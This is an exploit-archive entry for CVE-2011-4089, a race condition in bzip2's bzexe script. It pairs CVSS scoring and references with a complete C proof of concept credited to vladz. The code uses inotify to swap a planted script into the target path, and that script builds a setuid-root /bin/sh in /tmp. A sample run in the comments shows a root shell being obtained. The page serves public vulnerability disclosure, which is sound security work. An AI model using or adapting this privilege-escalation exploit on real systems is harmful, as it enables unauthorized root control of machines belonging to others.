bzip2 1.0.5 local users execute arbitrary code

2014.04.18

Credit: Tavis Ormandy

Risk: Low

Local: Yes

Remote: No

CVE: CVE-2011-4089

CWE: CWE-264

CVSS Base Score: 4.6/10

Impact Subscore: 6.4/10

Exploitability Subscore: 3.9/10

Exploit range: Local

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

/* bzexec_PoC.c -- bzip2 (bzexe) race condition PoC
 
   Author:    vladz (http://vladz.devzero.fr)
   Tested on: Debian 6.0.3 up to date (bzip2 version 1.0.5-6)
 
   This PoC exploits a race condition in the bzexe script.  This tool is
   rarely used so I wasn't supposed to write an exploit.  But some people
   on the full-disclosure list had doubts about this exploitation.  Public
   discussion about this issue started from this post: 
   http://seclists.org/fulldisclosure/2011/Oct/776.
 
   I am using Inotify to win the race (on my dual-core, it succeed 100%).
 
      Usage: ./bzexe_PoC <command_name>
 
   For instance, if "/bin/dd" has already been compressed with bzexe,
   launch:
 
      $ ./bzexe_PoC dd
      [*] launching attack against "dd"
      [+] creating evil script (/tmp/evil)
      [+] creating target directory (/tmp/dd)
      [+] initialize inotify
      [+] waiting for root to launch "dd"
      [+] opening root shell
      # whoami
      root
*/
#define _GNU_SOURCE
#include <sys/inotify.h>
#include <stdlib.h>
#include <stdio.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <string.h>
#include <fcntl.h>
 
 
int create_nasty_shell(char *file) {
  char *s = "#!/bin/bash\n"
            "echo 'main(){setuid(0);execve(\"/bin/sh\",0,0);}'>/tmp/sh.c\n"
            "cc /tmp/sh.c -o /tmp/sh; chown root:root /tmp/sh\n"
            "chmod 4755 /tmp/sh; rm -f ${0}; ${0##*/} $@\n";
 
  int fd = open(file, O_CREAT|O_RDWR, S_IRWXU|S_IRWXG|S_IRWXO);
  write(fd, s, strlen(s));
  close(fd);
 
  return 0;
}
 
 
int main(int argc, char **argv) {
  int fd, wd;
  char buf[1], *targetpath,
       *evilsh = "/tmp/evil", *trash = "/tmp/trash";
 
  if (argc < 2) {
    printf("usage: %s <cmd name>\n", argv[0]);
    return 1;
  }
 
  printf("[*] launching attack against \"%s\"\n", argv[1]);
 
  printf("[+] creating evil script (/tmp/evil)\n");
  create_nasty_shell(evilsh);
 
  targetpath = malloc(sizeof(argv[1]) + 6);
  sprintf(targetpath, "/tmp/%s", argv[1]);
 
  printf("[+] creating target directory (%s)\n", targetpath);
  mkdir(targetpath, S_IRWXU|S_IRWXG|S_IRWXO);
 
  printf("[+] initialize inotify\n");
  fd = inotify_init();
  wd = inotify_add_watch(fd, targetpath, IN_CREATE);
 
  printf("[+] waiting for root to launch \"%s\"\n", argv[1]);
  syscall(SYS_read, fd, buf, 1);
  syscall(SYS_rename, targetpath,  trash);
  syscall(SYS_rename, evilsh, targetpath);
 
  inotify_rm_watch(fd, wd);
 
  printf("[+] opening root shell (/tmp/sh)\n");
  sleep(2);
  system("rm -fr /tmp/trash;/tmp/sh || echo \"[-] Failed.\"");
 
  return 0;
}

References:

https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=632862

http://www.ubuntu.com/usn/USN-1308-1

http://www.openwall.com/lists/oss-security/2011/10/28/16

http://www.exploit-db.com/exploits/18147

http://seclists.org/fulldisclosure/2011/Oct/804

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

bzip2 1.0.5 local users execute arbitrary code

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.